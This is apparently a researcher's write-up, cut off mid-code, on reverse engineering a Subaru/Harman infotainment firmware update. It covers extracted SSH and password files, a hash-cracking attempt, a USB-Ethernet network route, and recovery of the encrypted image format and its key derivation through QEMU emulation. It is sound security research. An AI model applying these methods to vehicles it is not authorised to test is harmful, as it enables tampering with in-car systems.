167M -rwxrwxrwx 1 work work 167M Jun 7 2017 swdl.iso
0 -rwxrwxrwx 1 work work 48 Jun 7 2017 swdl.iso.md5
86M -rwxrwxrwx 1 work work 86M Jun 7 2017 swupdate.dat
104M -rwxrwxrwx 1 work work 104M Jun 7 2017 system.dat

checkswdl.bat - Checks the md5sum of swdl.iso and compares it with swdl.iso.md5. Prints a nice pirate ship thumbs-up on a successful verification, else a pirate flag on failure.

          _@_
         ((@))
         ((@))
         ((@))
______===(((@@@@====)
##########@@@@@=====))
##########@@@@@----))
###########@@@@----)
========-----------
!!! FILE IS GOOD !!!!

At first, I thought the only signature checking on the update was an MD5 sum we could modify in the update folder. Thankfully, that assumption was incorrect.

KaliSWDL.log - Build log file. This doesn't look like it needs to be included with the update package. My guess is that it is just a build artifact Harman didn't clean up.
VARIANT : NAFTA LOGFILE : F:\Perforce\Jenkins\Slave\workspace\Subaru_Gen3_Release_Gen3.0\project\build\images\KaliSWDL\KaliSWDL.log MODELYEAR : MY2017 BUILD VERSION : Rel2.17.22.20 BUILD YEAR : 17 BUILD WEEK : 22 BUILD PATCH : 20 BUILD TYP : 1 BUILD BRANCH : Rel BUILD VP : Base The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. The system cannot find the file specified. - BuildType - 1 - Build Branch - Rel - Build Version Year - 17 - Build version Week - 22 - Build Version Patch - 20 - Model Year - MY2017 - Market - NA - Market - NA - VP - Base - Salt - 10 swdl.iso - ISO file containing lots of firmware related files. Guessing the ISO format was left over from older Harman systems where firmware updates were burned onto CDs. dat files - swupdate.dat and system.dat are high entropy files with no strings. Almost certainly encrypted. Only useful piece of information in the file is "QNXCNDFS" right at the beginning. Search engines, at the time I first looked at this, had no results for this filetype. My guess was that it was custom to Harman and/or QNX. $ hexdump -Cv -n 96 swupdate.dat 00000000 51 4e 58 43 4e 44 46 53 01 03 01 00 03 00 00 00 |QNXCNDFS........| 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 00000020 00 a4 07 0c 00 00 00 00 00 02 00 00 00 00 00 00 |................| 00000030 80 02 00 00 00 00 00 00 90 0e 00 00 00 00 00 00 |................| 00000040 04 00 00 00 00 00 00 00 c1 00 00 00 00 00 00 00 |................| 00000050 00 00 10 00 00 80 10 00 04 00 00 00 04 00 00 00 |................| As the dat files look encrypted, starting with the ISO file makes the most sense. swdl.iso The ISO contains many files. More build artifacts with logs from the build server, what look like bootloader binary blobs, several QNX binaries with full debug symbols we can disassemble, one installation shell-script and, most importantly, IFS files. 
$ file softwareUpdate softwareUpdate: ELF 32-bit LSB executable, ARM, EABI5 version 1 (SYSV), dynamically linked, interpreter /usr/lib/ldqnx.so.2, BuildID[md5/uuid]=381e70a72b349702a93b06c3f60aebc3, not stripped IFS Files QNX describes IFS as: An OS image is simply a file that contains the OS, plus any executables, OS modules, and data files that are needed to get the system running properly. This image is presented in an image filesystem (IFS). Thus, IFS is a binary format used by QNX. The only other important information to note here is that we can extract them with tools available on github. See dumpifs. ifs-subaru-gen3.raw Contents Running dumpifs on ifs-subaru-gen3.raw gets us this: Decompressed 1575742 bytes-> 3305252 bytes Offset Size Name 0 8 *.boot 8 100 Startup-header flags1=0x9 flags2=0 paddr_bias=0 108 52008 startup.* 52110 5c Image-header mountpoint=/ 5216c 1994 Image-directory ---- ---- Root-dirent 54000 8e000 proc/boot/procnto-instr e2000 16f4 proc/boot/.script e4000 521 bin/.kshrc e5000 2e6 bin/boot.sh e6000 10d bin/mountMMC0.sh e7000 63 bin/umountMMC0.sh e8000 6b bin/mountUSB.sh e9000 2b9 bin/mountUSBUpdate.sh ea000 6d6 bin/startUpdate.sh Lots of base operating system files. We can extract most of them via dumpifs -bx ifs-subaru-gen3.raw. 
$ ls authorized_keys ftpd.conf libtracelog.so.1 shadow banner ftpusers ln slay Base.pub getconf login sleep boot.sh gpio.conf lsm-pf-v6.so slogger2 cam-disk.so group mount spi-master cat hosts mount_ifs spi-mx51ecspi.so checkForUpdate.sh i2c-imx mountMMC0.sh sshd_config cp ifs-subaru-gen3.raw mountUSB.sh ssh_host_dsa_key devb-sdmmc-mx6_generic img.conf mountUSBUpdate.sh ssh_host_key devc-pty inetd.conf mv ssh_host_rsa_key devc-sermx1 init.sh NAFTA.pub startNetwork.sh dev-ipc io passwd startRvc.sh dev-memory io-blk.so pf.conf startUpdate.sh dev-mmap ipl-subaru-gen3.bin pf.os SubaruPubkey.pmem earlyStartup.sh ksh pipe symm.key echo libcam.so.2 prepareEMMCBootArea.sh sync eMMCFactoryFormat.sh libc.so.3 procnto-instr touch eMMCFormat.sh libdma-sdma-imx6x.so.1 profile umount enableBootingFromEMMCBootArea.sh libfile.so.1 rm umountMMC0.sh fram.conf libslog2parse.so.1 scaling.conf uname fs-dos.so libslog2shim.so.1 scaling_new.conf updateIPLInEMMCBootArea.sh fs-qnx6.so libslog2.so.1 services waitfor This clearly isn't even close to all of the files the system will use to boot and launch the interface, but it's a start. Files of Note authorized_keys - key for sshd. Probably how Harman engineers can login over SSH for troubleshooting and field support. banner - sshd banner we see when we connect over WiFi. This indicates that we're looking at the right files. sshd_config - AllowUsers root, PasswordAuthentication yes, PermitRootLogin yes, Wow! passwd: root:x:0:0:Superuser:/:/bin/sh daemon::1:2:daemon:/: dm::2:8:dwnmgr:/: ubtsvc:x:3:9:bt service:/: logger:x:101:71:Subaru Logger:/home/logger:/bin/sh certifier:x:102:71:Subaru Certifier:/home/certifier:/bin/sh shadow - Password hashes for root and other accounts. QNX6 hashtype is supported by JTR (not hashcat as far as I am aware), but doesn't appear to be GPU accelerated. 
I spent several days attempting a crack on a 32-core system using free CPU credits I had from one of the major providers, but without GPU acceleration, got nowhere. As long as they made the password decently complicated, there isn't much we can do.

startNetwork.sh - Starts "asix adapter driver" then loads a DHCP client. In other words, we can buy a cheap USB to Ethernet adapter, plug it into the head unit's USB ports, and get access to the vehicle's internal network. This allows us access to sshd on base units that do not have the wireless chipset. This is almost certainly how Harman field engineers troubleshoot vehicles. We can verify this works by buying an ASIX adapter, plugging it in, powering up the head unit, watching traffic in Wireshark, and seeing the DHCP probes.

symm.key - Clearly a symmetric key. The obvious guess is that this is the key that decrypts the .dat files. Perfect.

minifs.ifs Contents

There are other IFS files included in the ISO. minifs.ifs seems to contain most of the files used during the software update process. Almost every command line binary on the system has handy help descriptions we can get via strings:

%C softwareUpdate
Usage =>
--------
To Start Service
installUpdate
-c language files
-l language id
-i ioc channel name ( e.g. /dev/ioc/ch4)
-b If running on Subaru Base Variant
-p pps path to platform features, e.g /pps/platform/features
-r config file path for RH850 Binary mapping
e.g)# installUpdate & or #
e.g) # installUpdate -l french_fr &
NAME=installUpdate
DESCRIPTION=installUpdate

There are too many files to note here, but a few stand out:

andromeda - An enormous 17MB-20MB binary blob that seems to run the UI and implement most of the head unit functionality. Looks to make heavy use of Qt.

installUpdate - Installs update files.

installUpdate.sh - Shell script that triggers the update. It is unknown who or what calls this script.
So, installUpdate.sh executes this at the end: echo " -< Start of InstallUpdate Service >- " installUpdate -c /fs/swMini/miniFS/usr/updatestrings.json -b postUpdate.sh What's in updatestrings.json? "SWDL_USB_AUTHENTICATED_FIRST_SCREEN": "This update may take up to 60 minutes to<br>complete. Please keep your vehicle running<br>(not Accessory mode) throughout the entire<br>installation.", "SWDL_USB_AUTHENTICATED_SECOND_SCREEN": "If you update while your vehicle is idling,<br>please make sure that your vehicle<br>is not in an enclosed spa ce such as a<br>garage.", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN": "The infotainment system will be temporarily<br>unavailable during the update.<br>Current Version: %s<br>Availab le Version: %s<br>Would you like to install now?", "SWDL_USB_AUTHENTICATED_THIRD_SCREEN_SAME_IMAGE": "The infotainment system will be temporarily<br>unavailable", The file contains the same strings shown to the user through the GUI during the software update process. Hence, installUpdate is almost certainly the file we want to reverse engineer to understand the update process. Remember the encrypted dat files with the QNXCNDFS header? Let's see if any binaries reference that string. $ ag -a QNXCNDFS Binary file cdqnx6fs matches. Binary file cndfs matches. $ strings cndfs %C - condense / restore Power-Safe (QNX6) file-systems %C -c [(general-option | condense-option)...] src dst %C -r [(general-option | restore-option)...] src dst General options: -C dll specify cache-control DLL to use with direct I/O -f force use of direct I/O, even if disk cache cannot be discarded -I use direct I/O for reading data -k key specify the key to use for data encryption / decryption. <key> must be a string of hexadecimal digits, optionally separated by punctuation characters. -K dll[,args] specify a DLL to provide the key to use for data encryption or decryption. Optionally, an arguments string can be added which will be passed to the key provider function. See below. 
-O use direct I/O for writing data -p name store progress information in shared-memory object <name> -s size specify the chunk size [bytes] (default: 1M) -S enable synchronous direct I/O. This should cause io-blk to discard cached blocks on direct I/O, which may reduce performance. Default is to try and discard the cache for the entire device before any I/O is performed (see -f option). -v increase verbosity -? print this help Condense-options: -b size specify the raw block size for compression [bytes] (default: 64k) -c condense file-system <src> into file <dst> -d num specify the data hashing method. <num> must be in the range 0..7 (default: 4). See below for supported methods. -D deflate data -h num specify the header hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. -m num specify the metadata hashing method. <num> must be in the range 0..6 (default: 4). See below for supported methods. Restore-options: -r restore file-system <dst> from condensed file <src> -V verify written data during restoration Where: src is the source file / block device dst is the destination file / block device Hash methods: 0 = none 1 = CRC32 2 = MD5 3 = SHA224 4 = SHA256 5 = SHA384 6 = SHA512 7 = AES256-GCM (encrypts; requires 256-bit key) It appears that cndfs/cdqnx6fs can both encrypt/decrypt our dat files, and CNDFS stands for "condensed" filesystem. The help message also lets us know that it is almost certainly encrypted with AES256-GCM, uses a 256-bit key, and may be compressed. Unfortunately, we'd need code execution to run this. ISO Modification The most logical first attack is to modify the ISO. We can verify this method is impossible by changing a single byte in the image and trying to install it. On USB insertion, the device probes for certain files on the USB stick. 
If it finds files that indicate an update, it will claim that it is verifying the integrity of the files (although it actually doesn't do this until reboot, strange!), print a "success" message, reboot into some form of software-update mode, and only then actually check the integrity of the ISO. Only the ISO header appears to be signed, but the header contains a SHA hash of the rest of the ISO. Installation will only continue if the header signature and the SHA hash both validate. Barring a mistake in the signature verification subroutines, we will be unable to modify the ISO for trivial code execution.

At this point we've extracted a large number of relevant files from the update package. The files appear to be specific to the early boot process of the device and a specific update mode. We don't yet know what is contained in the encrypted dat files.

Reverse Engineering QNXCNDFS

As code execution via ISO modification is unfortunately (fortunately?) not trivial, the next step is to decrypt the condensed dat file. Ideally the encrypted files contain some form of security-sensitive functionality, such as debug functionality we can abuse on USB insertion. Plenty of embedded systems trigger functionality and debug settings when specific files are loaded onto USB drives and inserted, so we can hope for that here. At worst, we will most likely gain access to more system files we can investigate for rooting opportunities.

QNXCNDFS is a custom image format with no known information available on the Internet, so we'll start from scratch with the installUpdate binary. We know that cndfs or cdqnx6fs are probably involved as they contain the QNXCNDFS string, but how do they get called?

installUpdate Flow

First, find any references to the cdqnx6fs or cndfs files in installUpdate. It probably gets called here:

LOAD:0805849C ; r0 is key?
LOAD:0805849C LOAD:0805849C dat_spawn_copy_directory ; CODE XREF: check_hash_copy+CA↓p LOAD:0805849C LOAD:0805849C var_28 = -0x28 LOAD:0805849C var_24 = -0x24 LOAD:0805849C var_20 = -0x20 LOAD:0805849C var_1C = -0x1C LOAD:0805849C var_18 = -0x18 LOAD:0805849C var_14 = -0x14 LOAD:0805849C LOAD:0805849C 70 B5 PUSH {R4-R6,LR} LOAD:0805849E 0C 46 MOV R4, R1 LOAD:080584A0 86 B0 SUB SP, SP, #0x18 LOAD:080584A2 0E 49 LDR R1, =aCopyDirectoryC ; "Copy Directory Command " LOAD:080584A4 06 46 MOV R6, R0 LOAD:080584A6 0E 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080584A8 15 46 MOV R5, R2 LOAD:080584AA FC F7 9D FA BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080584AE FC F7 6B FA BL sub_8054988 LOAD:080584B2 0C 4B LDR R3, =aR ; "-r" LOAD:080584B4 04 36 ADDS R6, #4 LOAD:080584B6 03 94 STR R4, [SP,#0x28+var_1C] LOAD:080584B8 02 96 STR R6, [SP,#0x28+var_20] LOAD:080584BA 01 20 MOVS R0, #1 LOAD:080584BC 00 93 STR R3, [SP,#0x28+var_28] LOAD:080584BE 0A 4B LDR R3, =aK ; "-k" LOAD:080584C0 04 95 STR R5, [SP,#0x28+var_18] LOAD:080584C2 0A 4A LDR R2, =(aFsSwminiMinifs_10+0x16) ; "cdqnx6fs" LOAD:080584C4 01 93 STR R3, [SP,#0x28+var_24] LOAD:080584C6 00 23 MOVS R3, #0 LOAD:080584C8 05 93 STR R3, [SP,#0x28+var_14] LOAD:080584CA 09 4B LDR R3, =off_808EA34 LOAD:080584CC D3 F8 94 10 LDR.W R1, [R3,#(off_808EAC8 - 0x808EA34)] ; "/fs/swMini/miniFS/bin/cdqnx6fs" LOAD:080584D0 08 4B LDR R3, =(aSCSIV+0xC) ; "-v" LOAD:080584D2 F9 F7 E0 E9 BLX spawnl LOAD:080584D6 06 B0 ADD SP, SP, #0x18 LOAD:080584D8 70 BD POP {R4-R6,PC} LOAD:080584D8 ; End of function dat_spawn_copy_directory spawnl creates a child process, so this seems like the correct location. If we look at the caller of dat_spawn_copy_directory, we find ourselves near code verifying some form of integrity of a dat file. 
LOAD:080586BC loc_80586BC ; CODE XREF: check_hash_copy+2E↑j LOAD:080586BC ; check_hash_copy+8E↑j LOAD:080586BC 20 6D LDR R0, [R4,#0x50] LOAD:080586BE 29 46 MOV R1, R5 LOAD:080586C0 3A 46 MOV R2, R7 LOAD:080586C2 04 F0 80 F8 BL check_dat_hash LOAD:080586C6 01 28 CMP R0, #1 LOAD:080586C8 81 46 MOV R9, R0 LOAD:080586CA 06 D1 BNE loc_80586DA LOAD:080586CC LOAD:080586CC invalid_dat_file ; CODE XREF: check_hash_copy+40↑j LOAD:080586CC 2E 49 LDR R1, =aIntrusionDetec ; "Intrusion detected: Invalid dat file!!!" LOAD:080586CE 2B 48 LDR R0, =_ZSt4cout ; std::cout LOAD:080586D0 FC F7 8A F9 BL _ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc ; std::operator<<<std::char_traits<char>>(std::basic_ostream<char,std::char_traits<char>> &,char const*) LOAD:080586D4 FC F7 58 F9 BL sub_8054988 LOAD:080586D8 41 E0 B loc_805875E check_dat_hash doesn't actually verify the dat files — instead, it verifies the ISO contents hash to a value that is in the ISO header. This is relatively easy to discover as the function does a fseek to 0x8000 right at the start. LOAD:0805C850 4F F4 00 41 MOV.W R1, #0x8000 ; off LOAD:0805C854 2A 46 MOV R2, R5 ; whence LOAD:0805C856 F4 F7 66 EE BLX fseek LOAD:0805C85A 78 B1 CBZ R0, loc_805C87C LOAD:0805C85C 04 21 MOVS R1, #4 LOAD:0805C85E 05 22 MOVS R2, #5 LOAD:0805C860 32 4B LDR R3, =aFseekFailedToO ; "Fseek failed to offset 32768" What is 0x8000? The ISO 9660 filesystem specifies that the first 0x8000 bytes are "unused". Harman appears to use this section for signatures and other header information. Thus, installUpdate is seeking past this header, then hashing the rest of the ISO contents to verify integrity. The header is signed and contains the comparison hash, so we cannot just modify the ISO header hash to modify the ISO as we'd also need to re-sign the file. That would require Harman's private key, which we obviously don't have. Before installUpdate calls into the QNXCNDFS functionality, the system needs to successfully verify the ISO signature. 
Easy enough, we already have a valid update that is signed. cdqnx6fs Start by looking at the cdqnx6fs strings. This handy string pops out: Source: '%s' %s Destination: '%s' %s Chunk size: %u bytes Raw chunk size: %u bytes Max raw blk length: %u bytes Max cmp blk length: %u bytes Extents per chunk: %u Condensed file information: Signature: 0x%08llx Version: 0x%08x Flags: 0x%08x Compressed: %s File size: %llu bytes Number of extents: %llu Header hash method: %s Payload data: %llu bytes Header hash: %s Metadata hash method: %s Metadata hash: %s Data hash method: %s Data hash: %s File system information: File system size: %llu bytes Block size: %u bytes Number of blocks: %u Bitmap size: %u bytes Nr. of used blocks: %u On execution, the application prints out a large amount of header data. If we go to the function printing this string, the mapping between the header and the string prints becomes clear. LOAD:0804AA8C 4D F2 1C 10+ MOV R0, #aCondensedFileI ; "Condensed file information:" LOAD:0804AA94 FF F7 96 E9 BLX puts LOAD:0804AA98 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AA9A D3 E9 00 23 LDRD.W R2, R3, [R3] LOAD:0804AA9E 4D F2 38 10+ MOV R0, #aSignature0x08l ; " Signature: 0x%08llx\n" LOAD:0804AAA6 FF F7 3A E9 BLX printf LOAD:0804AAAA BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAAC 1B 89 LDRH R3, [R3,#8] LOAD:0804AAAE 4D F2 5C 10+ MOV R0, #aVersion0x04hx ; " Version: 0x%04hx\n" LOAD:0804AAB6 19 46 MOV R1, R3 LOAD:0804AAB8 FF F7 30 E9 BLX printf LOAD:0804AABC BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AABE 5B 89 LDRH R3, [R3,#0xA] LOAD:0804AAC0 4D F2 80 10+ MOV R0, #aFsType0x04hx ; " FS type: 0x%04hx\n" LOAD:0804AAC8 19 46 MOV R1, R3 LOAD:0804AACA FF F7 28 E9 BLX printf LOAD:0804AACE BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AAD0 DB 68 LDR R3, [R3,#0xC] LOAD:0804AAD2 4D F2 A4 10+ MOV R0, #aFlags0x08x ; " Flags: 0x%08x\n" R3 points to the DAT file contents. Before each print, a constant is added to the DAT file content pointer then the value is dereferenced. 
In effect, each load shows us the correct offset to the field being printed. Thus, signature is offset 0 (the QNXCNDFS string, not a digital signature one might first suspect), version is offset 8, filesystem type is offset 0xA, etc. Using this subroutine, we can recover around 70-80% of the header data for the encrypted file with virtually no effort. Since we don't know what FS type actually means or corresponds to, these aren't the best fields to verify. If we go down a bit in the function, we get to more interesting header fields with sizes. LOAD:0804AB38 BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB3A D3 E9 04 23 LDRD.W R2, R3, [R3,#0x10] LOAD:0804AB3E 4D F2 10 20+ MOV R0, #aRawSizeLluByte ; " Raw size: %llu bytes\n" LOAD:0804AB46 FF F7 EA E8 BLX printf LOAD:0804AB4A BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB4C D3 E9 06 23 LDRD.W R2, R3, [R3,#0x18] LOAD:0804AB50 4D F2 38 20+ MOV R0, #aCondensedSizeL ; " Condensed size: %llu bytes\n" LOAD:0804AB58 FF F7 E0 E8 BLX printf LOAD:0804AB5C BB 68 LDR R3, [R7,#0x18+var_10] LOAD:0804AB5E D3 E9 08 23 LDRD.W R2, R3, [R3,#0x20] LOAD:0804AB62 4D F2 60 20+ MOV R0, #aRawDataBytesLl ; " Raw data bytes: %llu bytes\n" LOAD:0804AB6A FF F7 D8 E8 BLX printf Condensed size is a double-word (64-bit value) loaded at offset 0x18. This corresponds to this word in our header: 00000010 00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 |...?......^.....| 8c 1d 5e 05 00 00 00 00 is little endian for 90054028 bytes, which is the exact size of swupdate.dat. This is confirmation that we're on the right track with the header. The header contains several configurable hashes. There's a hash for the metadata, a hash for an "extents" and "cluster" table, and finally a hash for the actual encrypted data. The hash bounds can be reverse engineered by simply guessing else looking a bit further in the binary. The cdqnx6fs binary is quite compact and doesn't contain many debugging strings. 
Reverse engineering it will be time consuming, so attempting to guess at the file format instead of reverse engineering large amounts of filesystem IO code could save time.

Cluster Table

The cluster table contains a header-configurable number of clusters. I didn't know what clusters were at this point, but my initial guess was something akin to a filesystem block. The header also contains an offset to a table of clusters. The table of clusters looks like this:

00000280 90 0e 00 00 00 00 00 00 e1 e6 00 00 00 00 00 00 |................|
00000290 71 f5 00 00 00 00 00 00 19 1c 00 00 00 00 00 00 |q...............|
000002a0 8a 11 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |................|
000002b0 a3 2d 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 |.-..............|

Again, we can easily guess what this is with a little intuition. If we assume the first doubleword is a pointer into the existing file and navigate to offset 0x0E90, we get:

00000e50 80 f3 42 05 00 00 00 00 5f 89 07 00 00 00 00 00 |..B....._.......|
00000e60 df 7c 4a 05 00 00 00 00 96 fd 08 00 00 00 00 00 |.|J.............|
00000e70 75 7a 53 05 00 00 00 00 2c 21 06 00 00 00 00 00 |uzS.....,!......|
00000e80 a1 9b 59 05 00 00 00 00 eb 81 04 00 00 00 00 00 |..Y.............|
00000e90 0e 0f 86 ac 0a e5 9c 25 ce 6d 09 ee 9c 58 39 9a |.......%.m...X9.|
00000ea0 97 84 6f 26 5c 8b 03 c2 bf b6 c8 80 11 69 34 10 |..o&\........i4.|
00000eb0 c1 0c 02 5c 01 fa f8 fa 10 65 c2 d3 3b 49 82 14 |...\.....e..;I..|
00000ec0 d6 3c ef ce db 52 5b 11 42 69 6e c3 50 a2 1f af |.<...R[.Bin.P...|

0xE90 is the end of the cluster table (note the change in entropy). The first doubleword of each entry is almost certainly an offset into the data section. For the next doubleword, a guess is that it is the size of the cluster data. 0x0E90 + 0xE6E1 = 0xF571, and the next cluster entry offset is indeed 0xF571. We now understand the cluster table and the data section.
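The header fields and cluster table recovered so far can be sketched in a few lines of Python. This is only an illustration built from the bytes shown in the hexdumps above: the field names are my own labels, only the offsets confirmed by the disassembly (0x0 through 0x20) are parsed, and the (offset, length) reading of each table entry is the guess described above rather than a documented format.

```python
import struct

# First 0x30 bytes of swupdate.dat, copied from the hexdump earlier in the post.
HEADER = bytes.fromhex(
    "51 4e 58 43 4e 44 46 53 01 03 01 00 03 00 00 00 "
    "00 c0 ff 3f 00 00 00 00 8c 1d 5e 05 00 00 00 00 "
    "00 a4 07 0c 00 00 00 00 00 02 00 00 00 00 00 00 "
)

# First four cluster table entries, copied from the dump at offset 0x280.
CLUSTER_TABLE = bytes.fromhex(
    "90 0e 00 00 00 00 00 00 e1 e6 00 00 00 00 00 00 "
    "71 f5 00 00 00 00 00 00 19 1c 00 00 00 00 00 00 "
    "8a 11 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 "
    "a3 2d 01 00 00 00 00 00 19 1c 00 00 00 00 00 00 "
)


def parse_header(buf):
    """Decode the little-endian fields at offsets 0x00-0x27 (names are my own labels)."""
    fields = struct.unpack_from("<8sHHIQQQ", buf, 0)
    names = ("signature", "version", "fs_type", "flags",
             "raw_size", "condensed_size", "raw_data_bytes")
    header = dict(zip(names, fields))
    if header["signature"] != b"QNXCNDFS":
        raise ValueError("not a QNXCNDFS file")
    return header


def parse_cluster_table(table):
    """Split the table into (offset, length) pairs of 64-bit little-endian values."""
    return [struct.unpack_from("<QQ", table, pos) for pos in range(0, len(table), 16)]


def is_contiguous(clusters):
    """Check that every cluster ends exactly where the next one starts."""
    return all(off + length == nxt_off
               for (off, length), (nxt_off, _) in zip(clusters, clusters[1:]))


header = parse_header(HEADER)
clusters = parse_cluster_table(CLUSTER_TABLE)
print("condensed size:", header["condensed_size"])
for off, length in clusters:
    print(f"cluster at 0x{off:X}, 0x{length:X} bytes")
print("contiguous:", is_contiguous(clusters))
```

The contiguity check is the same sanity test as the manual addition above, applied to every adjacent pair of entries instead of just the first two.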
Cluster Data

Chunks of cluster data can now be extracted from the data segment using the cluster table. Each chunk looks entirely random and there is no clear metadata in any particular chunk. From the header data, we know that both dat files shipped in this update are encrypted and compressed. The decryption step will need to happen first, using AES256-GCM.

Via reverse engineering and searching for strings near the encryption code, it is clear that the cdqnx6fs binary is using Mbed TLS. The target decryption function is mbedtls_gcm_auth_decrypt. After researching GCM a bit more, it turns out we need the symmetric key, the initialization vector, and an authentication tag to correctly decrypt and verify the buffer. We have a probable symmetric key from the filesystem, but need to find the IV and tag.

Again, the code is dense and reverse engineering the true structure would take quite a bit of time, and I didn't find evidence of a constant IV, so let's guess. If I were designing this, I'd put the IV in the first 16 bytes, the tag in the next 16, then have the encrypted data following that. This seemed the most likely layout to me. There aren't too many logical combinations here, so we can also switch the IV and tag around, and try prepending and appending this data.

Unfortunately, after plugging in the symmetric key and trying the above process in Python, nothing seemed to decrypt correctly. The authentication tags never matched. Thus, we potentially guessed incorrectly on the structure of the encrypted clusters, the algorithm isn't actually AES-GCM (or it was modified), or something else is going on.

Before delving into the code, let's search for where the encryption key is passed from installUpdate to cdqnx6fs. The symm.key file seems like an obvious choice for the symmetric key, but maybe that isn't correct.

Decrypting

How do we locate where the symmetric key is loaded and passed to the new process? Search for the filename and examine all references.
There is only one reference, and it is passed to fopen64. A short while after, this value is passed to the cdqnx6fs process. Examine the following code: LOAD:08052ADE 37 48 LDR R0, =aDecrypting ; "Decrypting..." LOAD:08052AE0 FE F7 74 EE BLX puts LOAD:08052AE4 36 4B LDR R3, loc_8052BC0 LOAD:08052AE6 37 49 LDR R1, =(aR+1) ; "r" LOAD:08052AE8 18 68 LDR R0, [R3] ; "/etc/keys/symm.key" LOAD:08052AEA FE F7 68 EA BLX fopen64 LOAD:08052AEE 05 46 MOV R5, R0 LOAD:08052AF0 48 B9 CBNZ R0, loc_8052B06 LOAD:08052AF2 35 4B LDR R3, =(a89abcdefcalcne+8) ; "calcNewSymmKey" LOAD:08052AF4 02 21 MOVS R1, #2 LOAD:08052AF6 0A 46 MOV R2, R1 LOAD:08052AF8 00 93 STR R3, [SP,#0xC0+var_C0] LOAD:08052AFA 32 23 MOVS R3, #0x32 LOAD:08052AFC 01 93 STR R3, [SP,#0xC0+var_BC] LOAD:08052AFE 33 4B LDR R3, =aUnableToOpenSy ; " Unable to open symm key file : %s , %d"... LOAD:08052B00 FE F7 FE EC BLX slog2f LOAD:08052B04 1E E0 B return_err A major hint is the debug error message that happens to print the function name. The function the symmetric key gets loaded in is called calcNewSymmKey, and another debug message prints "Decrypting...". The symmetric key is modified via some form of transformation. Key Generation Back before every app was built with Electron and used around three gigs of RAM to send a tweet, software authors would distribute demos and shareware, which was software that usually had the complete functionality unlocked for a brief time-trial. To unlock it, you would pay the author and get back a code (serial) you could enter into the program. This serial was often tied to hardware specific information or a user-name. If the serial was valid, the program would unlock. There are numerous different ways to get around this. In order of what the "scene" considered most technically impressive and useful back in the day, the best way to bypass software serial schemes was as follows: Key Generator - Reverse engineer the author's serial registration algorithm. 
Port it to C or well-documented ASM, write a nifty Win32 applet that plays mod files and makes your logo spin around, etc.

Self-key generation - Modify the binary to print out the real serial number in a text box. Many programs would make the fatal mistake of comparing the true serial with the one the user entered via strcmp. Just change the comparison to a message box display function and exit right after, as you probably overwrote some important code. After you get the code, delete the patched version, install the original, and you have an "authentically" registered program.

Patching - Bypass the time limit, always return "Registered", etc. The more patches it took, the worse the "crack" usually was.

Reverse engineering the key generation algorithm was always the hardest method. Patching was challenging as it was a cat and mouse game between developers and crackers. Registration functionality would get increasingly complicated to try and obfuscate what was going on.

Harman has designed an encryption scheme that is quite similar to early software protection efforts.

Emulation

Harman's algorithm looks rather simple, as the function generating the new key doesn't call into any subroutines, doesn't use any system calls, and is only 120 lines of ARM. The ARM is interesting to look at, and one can statically analyze the entire process without ever leaving the subroutine. But understanding the assembly and converting it to C will take time. What if we could just emulate the algorithm?

We're running ARM. The easiest way will be to take the actual assembly and paste it directly into an assembly stub, then call into that from C. After it returns, print the modified memory contents. Cross-compile it, run it in QEMU, and done. The idea is to take the Harman transformation code and run it exactly.

This isn't quite as easy as copy-and-paste, but it is close. I had to modify a few registers to get this to work.
The assembly stub: .syntax unified .section .text .global decrypt .cpu cortex-a9 .thumb decrypt: push {r4-r7, lr} # Code goes here! pop {r4-r7, pc} The C shim: #include <stdio.h> extern char *decrypt(char *, int); #define SALT 0x0 int main() { char symmetric_key[] = "key-was-here"; char *output = decrypt(symmetric_key, SALT); printf("Key is: %s\n", output); return 0; } The Makefile: all: arm-linux-gnueabi-gcc -Wall -pedantic key.c -g algo.s -static -mthumb && qemu-arm -cpu cortex-a9 a.out clean: rm a.out The only other trick to note is that the calcNewSymmKey function takes in one parameter called a salt. Salt is loaded from the very end of the standard ISO header (0x7FDE) and is also printed in some of the build artifacts that are still packaged with the updates. 00007fd0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 39 |..............09| 00007fe0 a9 2b 74 10 51 6b 01 46 5b 1a e3 40 dc d1 ec d5 |.+t.Qk.F[..@....| 00007ff0 36 a4 53 0c 23 05 bd 76 ac 60 83 f0 7b 88 79 c5 |6.S.#..v.`..{.y.| 00008000 01 43 44 30 30 31 01 00 57 69 6e 33 32 2f 4d 69 |.CD001..Win32/Mi| The salt fetching code simply converts a two-digit ASCII character array into an integer. salt = 10 * DIGIT1 + DIGIT2 - 0x210; Which is just an expanded version of the "convert a two-digit character array representing an integer number to an integer" algorithm: salt = 10(DIGIT1 - 0x30) + (DIGIT2 - 0x30) After running the key generator with the correct salt, we get a significantly modified symmetric key that decrypts the clusters. Easy as that! I believe the true key generation algorithm can be derived by playing around with the symmetric key and the salt value with the key generator. It appears to be a simple rotation cipher. I will not release the full key generator as it is using Harman's own code. On the plus side, this should cut down on "I flashed a random binary to my head unit and it won't turn on" support e-mails. 
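The salt conversion described above can be sketched in a few lines of Python. This is only an illustration of the two-digit ASCII arithmetic, not Harman's code: the names `parse_salt`, `read_salt`, and `SALT_OFFSET` are made up for this example, and the offset 0x7FDE is taken from the hex dump above.

```python
SALT_OFFSET = 0x7FDE  # position of the two ASCII digits, per the hex dump above


def parse_salt(digits: bytes) -> int:
    """Convert two ASCII digit bytes (e.g. b"09") into an integer salt."""
    if len(digits) != 2 or not digits.isdigit():
        raise ValueError("expected exactly two ASCII digits")
    d1, d2 = digits  # iterating bytes yields integer character codes
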